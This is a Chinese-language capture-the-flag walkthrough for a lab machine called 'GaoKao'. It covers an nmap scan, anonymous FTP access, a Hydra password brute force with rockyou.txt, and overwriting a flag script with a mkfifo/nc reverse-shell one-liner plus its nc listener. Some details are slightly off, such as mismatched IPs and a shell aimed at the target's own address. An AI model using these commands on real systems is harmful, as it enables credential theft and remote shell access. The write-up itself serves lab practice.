一. 发现主机
arp-scan -l -I eth0
找打GaoKao主机IP地址 173.30.1.128
二. Nmap扫描主机
nmap -A -T5 172.30.1.128
-A :系统探测,版本检测,脚本扫描,路由跟踪
-T(0-5):数字越大速度越快(准确度低),数字越小速度越慢(准确度高)
-p- :代表扫描所有端口
我们发现ftp服务是支持匿名访问的
三. 访问FTP服务获取信息
ftp 172.30.1.128
默认用户名输入 ftp
默认密码ftp
我们发现有个sky的邮箱,地址我们可以尝试对这个用户名进行枚举爆破
四. 通过Hydra进行枚举爆破
hydra -v -l sky -P /usr/share/wordlists/rockyou.txt ftp://172.30.1.128
-v :显示详细信息
-l :用命
-P:密码字典
这里我们得到了sky的密码为thebest
五. 登录ftp中的sky用户
在这里我们可以发现有一个user.flag的文件我门将它下载到我们的/tmp目录下,并且我们发现sky用户对这个文件有读写功能
lcd /tmp切换本地目录
get user.flag 下载文件
我们发现这是一个脚本文件
写入nc反弹的shell的脚本
rm -rf /tmp/p; mkfifo /tmp/p;cat /tmp/p | sh -i 2>&1 | nc -nv 172.30.1.128 4444 > /tmp/p ;rm -rf /tmp/p
sh -i :反弹一个交互sehll
vim user.flag
写入脚本
开启kail中nc的服务端和上传user.flag脚本文件到ftp上
kail开启nc监听服务
nc -lvnp 4444
上传脚本文件到ftp服务器覆盖掉源文件
put user.flag user.flag
获取到shell完成
